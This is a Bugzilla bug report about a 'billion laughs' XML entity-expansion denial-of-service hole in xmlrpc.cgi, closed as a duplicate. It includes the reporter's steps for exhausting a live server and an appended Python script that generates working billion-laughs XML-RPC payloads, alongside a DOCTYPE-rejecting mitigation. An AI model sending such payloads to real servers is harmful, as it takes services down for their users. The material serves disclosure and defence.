Closed Bug 1151719 Opened 9 years ago Closed 9 years ago

XML Bombing vulnerability in /xmlrpc.cgi

Categories

(Bugzilla :: WebService, defect)

x86_64
Linux
defect
Not set
major

RESOLVED DUPLICATE of bug 1031035

People

(Reporter: jmcdonal, Unassigned)

Details

I am the development team lead for Red Hat Bugzilla.

An external user of Red Hat Bugzilla reported this issue.  I am re-reporting it here because (a) I do not have visibility of security issues in BMO, so I am unable to confirm whether the upstream Bugzilla developers are already aware of the issue, and (b) I would prefer that the issue is fixed upstream rather than only in Red Hat Bugzilla.

The original report, from https://bugzilla.redhat.com/show_bug.cgi?id=1209111 (currently access restricted to a small subset of Red Hat staff) is reproduced below.  I have omitted the original reporter's identity at this time as I do not have their explicit permission to identify them, though I am seeking that permission.

An additional concern I have is that the screenshots shown in the original bug report are public and show both Red Hat Bugzilla's hostname and the contents of the troublesome request (though http://en.wikipedia.org/wiki/Billion_laughs indicates that the content has been well-known for some years).  I have asked the original reporter to take those screenshots down and attach them directly to the bug report instead.


Original Description of problem:

XML Bombing / XML DoS / "Billion laughs attacks" is a well known vulnerability that can be found in an XML parser that accepts DTDs and entities.
As a reference, you can visit https://msdn.microsoft.com/en-us/magazine/ee335713.aspx 

Version-Release number of selected component (if applicable):
The current version of Bugzilla that is installed at bugzilla.redhat.com . 

How reproducible: Easy to reproduce.

Steps to Reproduce:
1. Make the request visible at http://s23.postimg.org/sz3d6ipp7/lol6.png and notice how the response arrives almost instantly. 
2. Make the request visible at http://s7.postimg.org/baj2hzq6j/lol7.png and notice how the response takes a little longer to arrive. 
3. Make the request visible at http://s9.postimg.org/w0owxesrz/lol8.png and notice how the response takes about 10 times longer to arrive. 
4. Make the request visible at http://s17.postimg.org/za11eiyyn/lol9.png and notice how the response gives a timeout after a long period of time.
5. Make a few requests described above and enjoy how the server uses all its computational power and RAM to parse a few XMLs.
See the attachment for the request in plain text.

Actual results:
Possible DoS.

Expected results:
The parser should the usage of entities.

Additional info:
A request similar to the one described at point 5 might use up to 3GB of RAM and a great deal of CPU. With a relatively small number of requests, we can implement a DoS attack against the server that hosts Bugzilla software.
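The steps and the "3GB" figure above can be reproduced arithmetically without touching a live server. The script below is an added example, not code from this bug report or from Bugzilla: it builds the classic billion-laughs methodCall at a chosen nesting depth (lol6, lol7, lol8, lol9 in the screenshots correspond to depth 6..9), computes how much text a parser that honours the internal DTD subset must materialise, feeds a small instance to the stock expat binding to show the expansion really happens, and then shows one common gate that refuses any request carrying a DOCTYPE before a single entity is declared. It assumes the XML-RPC method name Bugzilla.version for the envelope and uses Python's expat as a stand-in for whatever XML parser the Bugzilla install used; the DOCTYPE-rejection gate is a general mitigation and not a description of the fix made in bug 1031035.

```python
"""Billion-laughs amplification against an XML-RPC endpoint, plus a DOCTYPE gate."""
import xml.parsers.expat

ENTITY_TEXT = "lol"   # replacement text of the innermost entity
FANOUT = 10           # each entity references the previous one this many times


def billion_laughs_payload(depth: int, method: str = "Bugzilla.version") -> str:
    """Build an XML-RPC methodCall whose internal DTD subset declares lol0..lol<depth>.

    The request stays under 1 KB while its expanded form grows as FANOUT**depth,
    which is the only thing the lol6..lol9 requests in the report vary.
    (Method name is an assumption chosen for illustration.)
    """
    decls = [f'<!ENTITY lol0 "{ENTITY_TEXT}">']
    for i in range(1, depth + 1):
        refs = f"&lol{i - 1};" * FANOUT
        decls.append(f'<!ENTITY lol{i} "{refs}">')
    lines = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE methodCall [",
        *decls,
        "]>",
        "<methodCall>",
        f"  <methodName>{method}</methodName>",
        f"  <params><param><value><string>&lol{depth};</string></value></param></params>",
        "</methodCall>",
    ]
    return "\n".join(lines) + "\n"


def expanded_bytes(depth: int) -> int:
    """Bytes a naive parser must materialise for one &lol<depth>; reference."""
    return len(ENTITY_TEXT) * FANOUT ** depth


class DoctypeRejected(ValueError):
    """Raised when a request carries a DOCTYPE and therefore may declare entities."""


def _count_string_text(payload: str, reject_dtd: bool) -> int:
    """Parse with the stdlib expat binding and return how many characters of
    <string> content come back after entity expansion."""
    parser = xml.parsers.expat.ParserCreate()
    state = {"in_string": False, "chars": 0}

    def start(name, attrs):
        if name == "string":
            state["in_string"] = True

    def end(name):
        if name == "string":
            state["in_string"] = False

    def text(data):
        if state["in_string"]:
            state["chars"] += len(data)

    def doctype(name, sysid, pubid, has_internal_subset):
        # Abort before any entity is declared: XML-RPC never needs a DTD.
        raise DoctypeRejected(f"DOCTYPE {name!r} not allowed in an XML-RPC request")

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text
    if reject_dtd:
        parser.StartDoctypeDeclHandler = doctype
    parser.Parse(payload, True)
    return state["chars"]


def expand_with_plain_expat(payload: str) -> int:
    """Vulnerable path: default settings, entities expanded in full."""
    return _count_string_text(payload, reject_dtd=False)


def parse_rejecting_dtd(payload: str) -> int:
    """Hardened path: any DOCTYPE aborts the parse with DoctypeRejected."""
    return _count_string_text(payload, reject_dtd=True)


def is_rejected(payload: str) -> bool:
    """True if the hardened parser refuses the payload."""
    try:
        parse_rejecting_dtd(payload)
    except DoctypeRejected:
        return True
    return False


# Constructed sample of a legitimate request (no DTD) to show the gate passes normal traffic.
BENIGN_REQUEST = (
    '<?xml version="1.0"?>\n'
    "<methodCall><methodName>Bugzilla.version</methodName>"
    "<params><param><value><string>hello</string></value></param></params></methodCall>\n"
)

if __name__ == "__main__":
    for depth in range(6, 10):          # lol6 .. lol9 from the report
        req = billion_laughs_payload(depth)
        print(f"lol{depth}: request {len(req)} bytes -> expands to {expanded_bytes(depth):,} bytes")
    print("depth 3 expanded by stock expat:", expand_with_plain_expat(billion_laughs_payload(3)))
    print("depth 3 rejected by DOCTYPE gate:", is_rejected(billion_laughs_payload(3)))
```

Depth 9 gives len("lol") * 10**9 = 3,000,000,000 bytes from a request of well under 1 KB, which is the "up to 3GB" observed above; each extra level multiplies the work by ten, matching the roughly ten-fold slowdown between consecutive steps. The demo only expands depth 3 (3,000 bytes) so it runs instantly; the hardened parser stops at the DOCTYPE itself, so its cost does not depend on the nesting depth at all.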
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Bug 1031035 is already public, so no need to keep this one private.
Group: bugzilla-security